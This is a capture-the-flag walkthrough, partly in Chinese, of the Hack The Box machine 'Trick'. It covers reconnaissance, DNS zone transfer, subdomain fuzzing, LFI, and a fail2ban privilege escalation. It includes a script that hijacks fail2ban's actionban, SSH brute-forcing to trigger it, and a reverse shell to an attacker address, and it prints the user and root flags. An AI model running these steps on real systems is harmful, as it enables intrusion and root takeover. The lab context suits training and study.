Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.166 | TCP :22,25,53,53,80 |
$ ip='10.10.11.166'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey:
|2048 61ff293b36bd9dacfbde1f56884cae2d (RSA)|256 9ecdf2406196ea21a6ce2602af759a78 (ECDSA)|_ 256 7293f91158de34ad12b54b4a7364b970 (ED25519)25/tcp open smtp Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Reverse DNS Lookup
$ dig @10.10.11.166 -x 10.10.11.166
# echo '10.10.11.166 trick.htb'>>/etc/hosts
$ dig axfr @10.10.11.166 trick.htb
# echo '10.10.11.166 preprod-payroll.trick.htb'>>/etc/hosts
Marketing LFI && Pany
$ ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-20000.txt -u -H "Host:preprod-FUZZ.trick.htb" -ac
# echo '10.10.11.166 preprod-marketing.trick.htb'>>/etc/hosts
$ arjun -u '
$ python3 pany.py -u '
User.txt
10c468007a6adfbd703fcfb4f253bb91
Privilege Escalation:fail2ban actionban && Tyrant
$ cd /etc/fail2ban
$ cd action.d
$ cat iptables-multiport.conf
由于属于security组,可以对该目录文件进行移动添加
将tyrant保存到/tmp
#!/bin/bash
# run.sh
echo "Waiting for the file to exist..."
while [[ ! -f /etc/fail2ban/action.d/iptables-multiport.conf ]]; do
sleep 0.1
done
echo "Backing up the original file..."
mv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak
cp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf
echo "[+] Modifying the file..."
sed -i -e "s|actionban = .*|actionban = /tmp/tyrant|g" \
-e "s|actionunban = .*|actionunban = /tmp/tyrant|g" \
/etc/fail2ban/action.d/iptables-multiport.conf
echo "[*] Changing file permissions..."
chmod 666 /etc/fail2ban/action.d/iptables-multiport.conf
echo "[+] Restarting fail2ban service..."
sudo -u root /etc/init.d/fail2ban restart
if [[ $? -ne 0 ]]; then
echo "[-] Fail2ban restart failed. Exiting."
exit 1
fi
echo "[*] Monitoring /tmp/tyrant for SUID permission..."
while true; do
if [[ -u /tmp/tyrant ]]; then
echo "[+] Successfully detected SUID on /tmp/tyrant. Exiting."
exit 0
fi
sleep 0.5
done
$ ./run.sh
攻击端持续发送载荷到22端口触发actionban
$ hydra -l root -P /home/maptnh/Desktop/rockyou.txt 10.10.11.166 ssh -t 4 -vV
$ /tmp/tyrant -uid 0 -rhost 10.10.16.33 -rport 4443
Root.txt
ce2824dc567a34aa0e509ddb8337782b
发布评论